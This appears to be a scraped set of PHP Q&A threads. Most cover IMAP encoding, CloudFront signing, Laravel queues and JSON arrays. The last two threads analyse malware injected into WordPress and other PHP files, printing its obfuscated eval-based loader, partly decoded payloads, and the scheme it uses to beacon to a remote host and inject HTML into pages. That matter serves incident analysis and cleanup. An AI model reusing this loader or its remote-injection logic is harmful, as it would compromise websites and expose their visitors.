imap_mail_move() not working on special characters (äüö...) - php

I am using imap_mail_move() to move emails from one folder to another. This works pretty well, but not if it comes to special characters in the folder name. I am sure I need to encode the name, but all test where not succesful.
Anybody that has a nice idea? Thanks in advance.
class EmailReader {
function doMoveEmail($uid, $targetFolder) {
$targetFolder = imap_utf8_to_mutf7($targetFolder);
$return = imap_mail_move($this->conn, $uid, $targetFolder, CP_UID);
if (!$return) {
return $return;
Calling the function in the script
$uid = 1234;
$folderTarget1 = "INBOX.00_Korrespondenz";
$this->doMoveEmail($uid, $folderTarget1);
$folderTarget2 = "INBOX.01_Anmeldevorgang.011_Bestätigungslink";
$this->doMoveEmail($uid, $folderTarget2);
The execution of the first call (folderTarget1) is working pretty well.
The execution of the secound call (folderTarget2) is creating an error:
[TRYCREATE] Mailbox doesn't exist: INBOX.01_Anmeldevorgang.011_Bestätigungslink (0.001 + 0.000 secs).
Remark 1:
if I call imap_list(), the name of the folder is shown as
"INBOX.01_Anmeldevorgang.011_Besta&Awg-tigungslink" (=$val)
$new = mb_convert_encoding($val,'UTF-8','UTF7-IMAP')
echo $new; // gives --> "INBOX.01_Anmeldevorgang.011_Bestätigungslink"
$new2 = mb_convert_encoding($new,'UTF7-IMAP', 'UTF-8')
echo $new2; // gives --> "INBOX.01_Anmeldevorgang.011_Best&AOQ-tigungslink"
Remark 2
I checked each possible encoding, with the following script, but none of them matchs the value that is returned by imap_list().
// looking for "INBOX.01_Anmeldevorgang.011_Besta&Awg-tigungslink" given by imap_list().
$targetFolder = "INBOX.01_Anmeldevorgang.011_Bestätigungslink";
foreach(mb_list_encodings() as $chr){
echo mb_convert_encoding($targetFolder, $chr, 'UTF-8')." : ".$chr."<br>";

Your folder name, as on the server, Besta&Awg-tigungslink is not canonically encoded:
&Awg- decodes as the combining diaereses character. Using some convenient python to look it up:
import base64
import unicode data
x = base64.b64decode('Awg=').decode('utf-16be'); # equals added to satisfy base64 padding requirements
This combines with the a in front of it to show ä.
Your encoder is returning the more common precomposed form:
x = base64.b64decode('AOQ=').decode('utf-16be')
This is a representation of ä directly.
Normally, when you work with IMAP folders, you pass around the raw name, and only convert the folder name for display. As you can see, there is not necessarily a one-way mapping from glyphs to encodings in unicode.
It does surprise me that PHP does seem to be doing a canonicalization step when encoding; I would expect round tripping the same data to return the same thing.

I created a workaround, which helps me to work with UTF8-values and to translate it to the original (raw) IMAP folder name.
function getFolderList() {
$folders = imap_list($this->conn, "{".$this->server."}", "*");
if (is_array($folders)) {
// Remove Server details of each element of array
$folders = array_map(function($val) { return str_replace("{".$this->server."}","",$val); }, $folders);
// Sort array
// Renumber the list
$folders = array_values($folders);
// add UTF-8 encoded value to array
// this is needed as the original value is so wiered, that it is not possible to encode it
// with a function on the fly. This additional utf-8 value is needed to map the utf-8 value
// to the original value. The original value is still needed to do some operations like e.g.:
// - imap_mail_move()
// - imap_reopen()
// ==> the trick is to use normalizer_normalize()
$return = array();
foreach ($folders as $key => $folder) {
$return[$key]['original'] = $folder;
$return[$key]['utf8'] = normalizer_normalize(mb_convert_encoding($folder,'UTF-8','UTF7-IMAP'));
return $return;
} else {
die("IMAP_Folder-List failed: " . imap_last_error() . "\n");


How to combine stream name in AWS cloudfront?

Amazon Cloudfront SDK and example code - how do I combine the stream name? All the other functions are spelled out, but I can't see any definition or example for create_stream_name().
Below is the complete code from the example as described in the documentation here :
As you can see, the function create_stream_name() does not appear anywhere but is called in line 12, which will result in a "call to undefined function" error. How should I define create_stream_name()?
function get_canned_policy_stream_name($video_path, $private_key_filename, $key_pair_id, $expires) {
// this policy is well known by CloudFront, but you still need to sign it,
// since it contains your parameters
$canned_policy = '{"Statement":[{"Resource":"' . $video_path . '","Condition":{"DateLessThan":{"AWS:EpochTime":'. $expires . '}}}]}';
// sign the canned policy
$signature = $this->rsa_sha1_sign($canned_policy, $private_key_filename);
// make the signature safe to be included in a url
$encoded_signature = $this->url_safe_base64_encode($signature);
// combine the above into a stream name
$stream_name = create_stream_name($video_path, null, $encoded_signature, $key_pair_id, $expires);
// url-encode the query string characters to work around a flash player bug
return encode_query_params($stream_name);
function rsa_sha1_sign($policy, $private_key_filename) {
$signature = "";
// load the private key
$fp = fopen($private_key_filename, "r");
$priv_key = fread($fp, 8192);
$pkeyid = openssl_get_privatekey($priv_key);
// compute signature
openssl_sign($policy, $signature, $pkeyid);
// free the key from memory
return $signature;
function url_safe_base64_encode($value) {
$encoded = base64_encode($value);
// replace unsafe characters +, = and / with
// the safe characters -, _ and ~
return str_replace(
array('+', '=', '/'),
array('-', '_', '~'),
The function create_stream_name() is defined in the full example (demo.php) which you can download at The full example is linked to at the top of the documentation page, though it's somewhat obscured behind the text "Signature Code for Video Streaming in PHP." [Update: It's no longer obscured, see below.]
Full disclosure: I'm the person responsible for that documentation page, so I'll do a couple of things to make it better:
Make the link to the full sample more discoverable. [Update: The download URL for the full example is now more prominent at the top of the documentation page.]
Add the full example to the page, so you can see and copy it right off the page, rather than having to download a zip file. [Update: The full example is now published at the bottom of the documentation page.]

Laravel: Unable to JSON encode payload. Error code: 5

I'm working on Laravel (v5.7) app that converts uploaded CSV (with contacts) into array that is then passed as argument when job class is being dispatched.
Here is the example of CSV file (format that is supported):
Uploaded (CSV) file is handled like this:
$file_path = $request->file_name->store('contacts');
$file = storage_path('app/' . $file_path);
$contactsIterator = $this->getContacts($file);
$contacts = iterator_to_array($contactsIterator); // Array of contacts from uploaded CSV file
protected function getContacts($file)
$f = fopen($file, 'r');
while ($line = fgets($f))
$row = explode(",", $line);
yield [
'phone' => !empty($row[0]) ? trim($row[0]) : '',
'firstname' => !empty($row[1]) ? trim($row[1]) : '',
'lastname' => !empty($row[2]) ? trim($row[2]) : '',
Finally, $contacts array is passed to a job that is dispatched:
This job class looks like this:
public function __construct($contacts)
Log::info('ImportContacts#__construct START');
$this->contacts = $contacts;
Log::info('ImportContacts#__construct END');
public function handle()
... and everything worked fine (no errors) until I've tried with this CSV:
Please notice ÿ. So, when I try with this CSV - I get this error exception:
/code_smsto/vendor/laravel/framework/src/Illuminate/Queue/Queue.php | 91 | Unable to JSON encode payload. Error code: 5
... and my log file looks like this:
error local 2019-11-11 17:17:18 /code_smsto/vendor/laravel/framework/src/Illuminate/Queue/Queue.php | 91 | Unable to JSON encode payload. Error code: 5
info local 2019-11-11 17:17:18 ImportContacts#__construct END
info local 2019-11-11 17:17:18 ImportContacts#__construct START
As you can see - handle method was never executed. If I remove ÿ - no errors and handle is executed.
I've tried to solve this, but without success:
Apply utf8_encode:
protected function getContacts($file, $listId)
$f = fopen($file, 'r');
while ($line = fgets($f))
$row = explode(",", $line);
yield [
'phone' => !empty($row[0]) ? utf8_encode($row[0]) : '',
'firstname' => !empty($row[1]) ? utf8_encode($row[1]) : '',
'lastname' => !empty($row[2]) ? utf8_encode($row[2]) : '',
... and it works (no errors, no matter if there's that ÿ), but then Greek and Cyrillic letters are turned into question marks. For example, this: Εθνικής will become ???????.
I also tried with mb_convert_encoding($row[1], 'utf-8') - and it doesn't turn Greek or Cyrillic letter into question marks, but this ÿ character will become ?.
Move "handling" (converting to array) of uploaded CSV file into #handle method of a Job class worked, but then I was not able to store the data from that array into DB (MongoDB). Please see the update below.
This is what I get from dd($contacts);:
So, it has that "b" where ÿ is. And, after some "googling" I found that this "b" means "binary string", that is, a non unicode string, on which functions operate at the byte level (What does the b in front of string literals do?).
What I understand is this: When dispatching Job class, Laravel tries to "JSON encode" it (passed arguments/data) but it fails because there are binary data (non-unicode strings).
Anyway, I was not able to find a solution (to be able to handle such CSV file with ÿ).
I am using:
Laravel 5.7
PHP (cli) (built: Aug 7 2019 10:22:48) ( NTS )
Redis powered queues
When I move "handling" (converting to array) of uploaded CSV file into #handle method of a Job class - I don't get this error (Unable to JSON encode payload. Error code: 5), but when I try to store that problematic binary data with ÿ (b"Richardÿ") into MongoDB - it fails. The weird thing is that I don't get any error-exception message in log file, so I put all in try-catch like this:
try {
// Insert data into MongoDB
} catch (Exception $e) {
... and this is the result:
Anyway, I believe that it failed because of b"Richardÿ", and I guess that the solution is in encoding string, but as I've mentioned - I was not able to find a solution that works:
utf8_encode works (no errors, no matter if there's that ÿ), but then Greek and Cyrillic letters are turned into question marks. For example, this: Εθνικής will become ???????
mb_convert_encoding($row[1], 'utf-8') - it doesn't turn Greek or Cyrillic letter into question marks, but this ÿ character will become ?.
iconv('windows-1252', 'UTF-8', $row[1]) - works (no errors, no matter if there's that ÿ), but when there are Greek or Cyrillic letters - it fails (I get this error exception: iconv(): Detected an illegal character in input string)
You have several ways to deal with it but I'd recommend the following two. In both cases, the idea is that you store a UTF-8 string.
A simpler approach, figure out what encoding it is out of the (your) predefined list and convert it to UTF8.
$encoding = mb_detect_encoding($content, 'UTF-8, ISO-8859-1, WINDOWS-1252, WINDOWS-1251', true);
if ($encoding != 'UTF-8') {
$string = iconv($encoding, 'UTF-8//IGNORE', $row[1]);
The second approach is to use a third party library outlined in this answer

Extracting a precise value from a Json array with PHP (like a MySQL db)

another (probably) easy question for you.
As I wrote many times, I'm not a programmer but thanks to you I was able to build an interesting site for my uses.
So again thx.
This is my new problem:
I have a site that recover json data from a file and store it locally once a day (this is the code - I post it so it can be useful to anyone):
function findList() {
$serverName = strtolower($_POST["Server"]); // GET SERVER FROM FORM POST
$localCoutryList = ("json/$serverName/countries.json"); // LOCAL LOCATIONS OF FILE
$urlCountryList = strtolower("url.from.where.I.get.Json.file.$serverName/countries.json"); // ONLINE LOCATION OF FILE
if (file_exists($localCoutryList)) { // FILE EXIST
$fileLastMod = date("Y/m/d",filemtime($localCoutryList)); // IF FILE LAST MOD = FILE DATE TIME
$now = date('Y/m/d', time()); // NOW
if ($now != $fileLastMod) { // IF NOW != FILE LAST MOD (date)
createList($serverName,$localCoutryList,$urlCountryList); // GO AND CREATE FILE
} else { // IF NOW = FILE LAST MOD (date)
jsonList($serverName,$localCoutryList,$urlCountryList); // CALL JSON DATA FROM FILE
}} else { // FILE DOESN'T EXIST
createList($serverName,$localCoutryList,$urlCountryList); // CALL CREATE FILE
function createList($serverName,$localCoutryList,$urlCountryList) {
file_put_contents($localCountryList, file_get_contents($urlCountryList)); // CREATE FILE
jsonList($serverName); // CALL JSON DATA FROM FILE
function jsonList($serverName,$localCoutryList,$urlCountryList) { // JSON DATA FROM FILE
$jsonLoopCountry = file_get_contents($localCoutryList); // GET CONTENT OF THE LOCAL FILE
$outLoopCountry = json_decode($jsonLoopCountry, true); // DECODE JSON FILE
$countryList = $outLoopCountry['country']; // ACCESS TO JSON OBJECT
foreach ($countryList as $dataCountry) { // FOR EACH "COUNTRY" IN JSON DECODED OBJECT
$iscountryID = ($dataCountry['id']); // TEST
$countryCurrency = ($dataCountry['curr']); // TEST
$countryName = ($dataCountry['name']);} // TEST
echo "<br>total country list: ".count($countryList); // THIS RETURN TOTAL ELEMENTS IN THE ARRAY
The kind of Json data I'm working with is structured as it follows:
So I can say that
$outLoopCountry = json_decode($jsonLoopCountry, true); // DECODE JSON FILE
creates the JSON ARRAY right? (Because JSON array starts with {"something":[{"..."...)
if it was [{"a":"answer","b":"answer",...} ... it would have a been a JSON Object right?
So to access to the array I uses
$countryList = $outLoopCountry['country']; // ACCESS TO JSON OBJECT
So I understood that arrays are a fast useful ways to store relational data and access to it right?
So the question is how to make a precise search inside the array, so to make it works like a Query MySQLi, like "SEARCH INSIDE ARRAY WHERE id == 7" and have as a result "== ITALY" (ex.).
The way exist for sure, but with whole exmples I found on the net, I was able to fix one to make it works.
Thx again.

Malicious code found in WordPress theme files. What does it do?

I discovered this code inserted at the top of every single PHP file inside of an old, outdated WordPress installation. I want to figure out what this script was doing, but have been unable to decipher the main hidden code. Can someone with experience in these matters decrypt it?
<?php if (!isset($GLOBALS["anuna"])) {
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1;
} ?>
<?php $nzujvbbqez = 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$uskbxljsbs = explode(chr((169 - 125)), '6393,48,9851,47,2858,50,3117,23,8291,22,9595,68,3457,33,7412,23,3914,63,6775,52,3088,29,1791,56,2150,28,6441,66,3140,43,1906,35,926,36,7276,35,2578,51,2993,59,275,45,6613,30,9241,42,9210,31,886,40,9989,41,5417,69,4931,62,1312,54,534,47,483,51,7223,53,10071,35,6190,50,3811,39,6142,48,2353,24,7062,23,6048,57,1266,46,3977,58,8168,55,1633,23,5272,63,2455,47,2659,30,6751,24,6827,38,2377,38,9554,41,3706,63,5644,70,4249,67,5105,50,4787,40,5574,24,1087,21,7389,23,1108,60,6277,47,6865,29,5486,28,8828,28,9283,26,1366,61,3223,27,6949,50,8506,23,3850,64,1739,52,9128,24,5714,20,9449,70,7435,62,8131,37,4653,70,0,29,4316,56,3572,68,4528,39,180,20,9379,70,200,35,1028,30,92,20,5025,38,7567,50,9519,35,2908,51,8672,58,8986,47,9152,58,9087,20,5879,29,3769,42,8029,45,5391,26,8333,25,5063,42,5203,69,9718,65,726,20,157,23,4567,33,1847,28,1212,54,9898,51,3640,66,6324,49,5155,48,61,31,9783,68,2271,36,815,38,7717,69,2793,42,5335,56,5543,31,3399,58,2629,30,6373,20,4372,65,8925,61,5598,23,362,57,7363,26,3353,46,3052,36,1581,52,2178,48,4180,20,853,33,1656,26,2766,27,5847,32,4993,32,1168,44,9663,55,2835,23,698,28,5908,51,6999,63,1530,51,419,64,9107,21,7617,37,7497,70,962,66,2415,40,4437,51,7786,70,4624,29,8730,39,8358,50,5988,60,8074,57,6105,37,4723,64,1682,57,1489,41,1058,29,3250,41,7155,29,3291,62,29,32,8408,59,5514,29,8313,20,3490,55,235,40,8223,68,8467,39,8636,36,7184,39,320,42,9033,34,6643,67,2521,57,2026,60,2959,34,7856,64,6240,37,4200,49,4827,66,1979,47,4893,38,581,48,1875,31,655,43,4035,53,5621,23,6507,46,6553,60,8769,59,7654,63,7920,49,8593,43,5734,68,5802,45,9309,70,1941,38,629,26,5959,29,9067,20,7085,70,9949,40,4088,56,10030,41,4144,36,8529,64,3545,27,4488,40,2307,46,2086,64,1427,62,6710,41,746,69,2689,20,2709,57,6894,55,2226,45,8856,26,8882,43,7311,52,3183,40,112,45,4600,24,7969,60,2502,19');
$aemhtmvyge = substr($nzujvbbqez, (69491 - 59385), (44 - 37));
if (!function_exists('hperlerwfe')) {
function hperlerwfe($opchjywcur, $oguxphvfkm) {
$frnepusuoj = NULL;
for ($yjjpfgynkv = 0;$yjjpfgynkv < (sizeof($opchjywcur) / 2);$yjjpfgynkv++) {
$frnepusuoj.= substr($oguxphvfkm, $opchjywcur[($yjjpfgynkv * 2) ], $opchjywcur[($yjjpfgynkv * 2) + 1]);
return $frnepusuoj;
$rfmxgmmowh = " /* orpuzttrsp */ eval(str_replace(chr((230-193)), chr((534-442)), hperlerwfe($uskbxljsbs,$nzujvbbqez))); /* unvtjodgmt */ ";
$yiffimogfj = substr($nzujvbbqez, (60342 - 50229), (38 - 26));
$yiffimogfj($aemhtmvyge, $rfmxgmmowh, NULL);
$yiffimogfj = $rfmxgmmowh;
$yiffimogfj = (470 - 349);
$nzujvbbqez = $yiffimogfj - 1; ?>
After digging though the obfuscated code untangling a number of preg_replace, eval, create_function statements, this is my try on explaining what the code does:
The code will start output buffering and register a callback function triggered at the end of buffering, e.g. when the output is to be sent to the web server.
First, the callback function will attempt to uncompress the output buffer contents if necessary using gzinflate, gzuncompress, gzdecode or a custom gzinflate based decoder (I have not dug any deeper into this).
With the contents uncompressed, a request will be made containing the $_SERVER values of
... to the domain given by chars 0-8 or 8-15 (randomly picks one or the other) in an md5 hash of the IPv4 address of "" appended with ".com", currently giving md5(".com" . <IPv4> ) => md5(".com8.8.8.8") => "" / "".
The request will be attempted using file_get_contents, curl_exec, file and finally socket_write.
Note that no request will be made if:
any of the HTTP_USER_AGENT, REMOTE_ADDR or HTTP_HOST is empty/not set
PHP_SELF contains the word "admin"
HTTP_USER_AGENT contains any of the words "google", "slurp", "msnbot", "ia_archiver", "yandex" or "rambler".
Secondly, if the output buffer contents has a body or html tag, and the response from the request above (decoded using en2() function below) contains at least one "!NF0" string, the content between the first and second "!NF0" (or end of string) will be injected into the HTML page at the beginning of the body or in case there is no body tag, the html tag.
The code used for encoding/decoding traffic is this one:
function en2($s, $q) {
$g = "";
while (strlen($g) < strlen($s)) {
$q = pack("H*", md5($g . $q . "q1w2e3r4"));
$g .= substr($q, 0, 8);
return $s ^ $g;
$s is the string to encode/decode and $q is a random number between 100000 and 999999 acting as a key.
The request URL mentioned above is calculated like this:
$url = "http:// ... /"
. $op // Random number/key
. "?"
. urlencode(
base64_encode(en2( $http_user_agent, $op)) . "." .
base64_encode(en2( $http_referrer, $op)) . "." .
base64_encode(en2( $remote_addr, $op)) . "." .
base64_encode(en2( $http_host, $op)) . "." .
base64_encode(en2( $php_self, $op))
While I have not found any sign of what initially placed the malicious code on your server, or that it does anything else than allowing for bad HTML/JavaScript code to be injected on your web pages that does not mean that it is not still there.
You really should make a clean install, like suggested by #Bulk above:
The only way you'll ever know for sure it's been cleaned is to
re-install absolutely everything you can from scratch - i.e. fresh
wordpress install, fresh plugin install. Then literally comb every
line of your theme for anything out of the ordinary. Also of note,
they often will put things in wp-content/uploads that look like images
but aren't - check those too.
Pastebin here.

Hacked site - encrypted code

Couple days ago I gave noticed that almost all php files on my server are infected with some encrypted code and in almost every file is different. Here is the example from one of the files:
Can anybody tell me what this code do or how to decode it?
You can calculate the values of some of the variables, and begin to get your bearings.
$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh() $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);
So the initial purpose is to call the wgcdonznijh() function with the payloads in the script, this is done by way of an embedded function call in the pre_replace subject the /e in the expression.
/* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */
If you hex decode the result of that you will be just about here:
if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
$GLOBALS["anuna"] = 1;
function fjfgg($n)
return chr(ord($n) - 1);
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...
The above is truncated, but you have another payload as the subject of the new preg_replace function. Again due to e it has the potential to execute.
and it is using the callback on array_map to further decode the payload which passed to the eval.
The pay load for eval looks like this (hex decoded):
$t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5;-4_g#&oc$5;oc$v5Y5;-3_g#&oc$5;oc$v5Y5;-2_g#&oc$5;oc$v5Y5;-1_g#&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW#5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW#5{6))086,1pi$6,J(tcennocW#!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW#&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi#(pi2gnol#&2pi$5;)X$(emanybXteg#&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap#6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi#&%5;-elif#&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z#&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg# nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe#=1a$ ;)po$,)-$(dtg#(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45#9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *# = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W#Y#RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|#:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i
Which looks truncated ...
That is far as I have time for, but if you wanted to continue you may find the following url useful.
Good luck
I found the same code in a Wordpress instance and wrote a short script to remove it of all files:
$directory = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($directory);
foreach ($iterator as $filename => $cur)
$contents = file_get_contents($filename);
if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) {
echo $filename.PHP_EOL;
file_put_contents($filename, substr($contents, 13280));
Just change the string 'tngmufxact' to your obfuscated version and everything will be removed automatically.
Maybe the length of the obfuscated string will differ - don't test this in your live environment!
Be sure to backup your files before executing this!
I've decoded this script and it is (except the obfuscation) exactly the same as this one: Magento Website Hacked - encryption code in all php files
The URL's inside are the same too:
If you are unsure/inexperienced don't try to execute or decode the code yourself, but get professional help.
Besides that: the decoding was done manually by picking the code pieces and partially executing them (inside a virtual machine - just in case something bad happens).
So basically I've repeated this over and over:
echo the hex strings to get the plain text (to find out which functions get used)
always replace eval with echo
always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))
The e at the end of the regular expression means evaluate (like the php function eval), so don't forget to remove that too.
In the end you have a few function definitions and one of them gets invoked via ob_start.
